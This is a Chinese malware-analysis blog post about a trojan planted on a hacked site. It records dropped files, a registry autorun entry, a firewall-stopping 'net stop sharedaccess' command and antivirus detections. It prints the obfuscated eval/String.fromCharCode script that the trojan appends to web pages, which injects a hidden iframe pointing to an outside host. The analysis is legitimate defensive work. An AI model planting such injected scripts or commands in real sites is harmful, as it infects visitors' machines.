解读网站被挂其中木马分析js+eval实现_病毒查杀

在FF看到这消息.. 于是就把网页解开了..
原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了..

其中挂上一个木马
hxxp://www.es86.com/pic/ddb/2006692151148920.gif

就此做个分析吧..
运行样本.
释放文件
C:\win30.exe
调用cmd 运行命令 /c net stop sharedaccess

访问网站
61.129.102.79
地址应该是:hxxp://www.es86.com 80端口通讯

下载:hxxp://www.es86.com/es86/db/dvbbs.mdb
此文件为rar 文件..

dvbbs.mdb 释放出文件为
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe

写入注册表
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"

在 htm 和 aspx 尾部加入代码
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

解密为
<script>
p="<iframe height=0 width=0 src="http://a-l.meibu.com/"></iframe>"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>

在线扫描
AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen 
BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22 
eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm 
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader 
Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV 
NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG 
Norman 5.80.02 03.02.2007 W32/Downloader 
Panda 9.0.0.4 03.01.2007 Suspicious file 

以上分析都在虚拟机里完成的..
这次加的壳实在脱不开..无法查看更详细..

不过猜测 编写语言为 Borland Delphi 6.0 - 7.0
尝试关闭一些安全软件 估计也有..

=.= 再此感叹..这什么破壳..

时间: 2024-09-17 21:36:08

解读网站被挂其中木马分析js+eval实现_病毒查杀的相关文章

比较不错的木马查找清除攻略_病毒查杀

一.学伯乐 认马识马 木马这东西从本质上说,就是一种远程控制软件.不过远程控制软件也分正规部队和山间土匪.正规部队顾名思义就是名正言顺的帮你远程管理和设置电脑的软件,如Windows XP自带的远程协助功能,一般这类软件在运行时,都会在系统任务栏中出现,明确的告诉用户当前系统处于被控制状态:而木马则属于山间土匪,他们会偷偷潜入你的电脑进行破坏,并通过修改注册表.捆绑在正常程序上的方式运行,使你难觅其踪迹. 木马与普通远程控制软件另外一个不同点在于,木马实现的远程控制功能更为丰富,其不仅能够实现一

SysLoad3.exe木马病毒的分析及清除方法_病毒查杀

使用前,请先断网,删除系统目录下的SysLoad3.exe以及1.exe,2.exe,...,7.exe,用IceSword删除临时目录下的那几个动态库.当任务管理器里没有iexplore.exe和notepad.exe的进程时,就可以运行这个恢复程序了.        特别注意:运行过程中,不要去运行其他程序,有可能你运行的那个程序就是带毒的!!  [b]二:以下是分析和手动清除方法:      昨天下午加班回来,发现本本的行为相当诡异.看了看任务管理器,有几个Ie的进程和几个Notepad的

清除中国网络游戏木马外挂黑客技术大全_病毒查杀

病毒具体分析 File: SFF.exe Size: 36864 bytes File Version: 2.00.0003 MD5: 248C496DAFC1CC85207D9ADE77327F8B SHA1: B32191D44382ED926716671398809F88DE9A9992 CRC32: 8C51AAAB 编写语言:Microsoft Visual Basic 5.0 / 6.0 病毒生成如下文件 %system32%\svchost.com 在HKEY_LOCAL_MACH

fjOs0r.dll、OnlO0r.dll 木马群的清除方法_病毒查杀

应该是有专门的生成器,遇到很多起了 不写分析了.. 解决方法: 1.下载sreng2.zip和IceSword120_cn.zip(以下简称冰刃) 下载后直接放桌面. 2.断开网络,关闭不需要的连接. 3.打开冰刃,设置-禁止线程创建,确定. 4.删除以下文件(如提示不存在文件不存在跳过即可): Code:  C:\Program Files\Common Files\fjOs0r.dll   31791 字节  C:\Program Files\Internet Explorer\OnlO0r

roirpy.exe,mrnds3oy.dll,qh55i.dll等木马群手工清除解决方案_病毒查杀

roirpy.exe,mrnds3oy.dll,qh55i.dll等木马群手工清除解决方案  用xdelbox删除下面文件(添加下面所有路径或在空白处点右键-从剪贴板导入,在已添加的文件路径上点击右键,选择立刻重启执行删除[有提示不存在该文件的就忽略,添加其它文件]):   c:\windows\roirpy.exe   c:\windows\uunjkd.exe   c:\windows\49400l.exe   c:\windows\49400m.exe   c:\windows\fjrlw

chenzi.exe的分析及解决方法_病毒查杀

File size: 18593 bytes  MD5: c595bc161e1d64b4d8f4d84139ef02b0  SHA1: 100e8a9ae7034b41443e4ddaa46f175adb70eb06  病毒名称:未知 测试时间:2007-3-10 更新时间:明晚将更新此分析日志, 运行后病毒样本,自动删除病毒本身,自动释放病毒到%system%目录下 %system%\del.bat %system%\msgcom.dll %system%\1.exe %system%\2.

U盘病毒分析附bat批处理文件_病毒查杀

                                U盘病毒分析                         作 者:CyyIsGood.Cloud ★功能:         一.分析某一个或多个磁盘中的Autorun.inf,确定引导的文件,备份引导文件并 将其删除.(如果让其一直运行,可以防范U盘病毒)         二.免疫某一个或多个磁盘,四级免疫:Autorun.inf文件夹.加系统/隐藏/只读 /存档属性.8.3子文件夹.NTFS写权.         三.发送备份

msnet.sys、jet300.dll的简单分析与清除办法_病毒查杀

江民对该病毒的定义名为:trojanspy.agent.rw       释放文件       %system%\drivers\svchost.exe       %system%\drivers\msnet.sys       %system%\jet300.dll       添加注册表信息       [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]       msnet %system%\drivers\msnet.sys

桌面不显示图标的盗号木马清除方法_病毒查杀

上周,金山反病毒中心截获一个以盗取"魔域"."完美世界"和"浩方游戏平台"为目的的木马病毒,该病毒名为Win32.Troj.OnlineGames.ms.18432,自上周四出现以来已经衍生多个变种.金山客服中心接到大量用户投诉,反映系统重启无法显示桌面.金山毒霸(病毒库版本2007.04.07.16)已经可以查杀该病毒目前所有变种. 病毒分析报告: 这是一个盗取"魔域"."完美世界"和"浩方游戏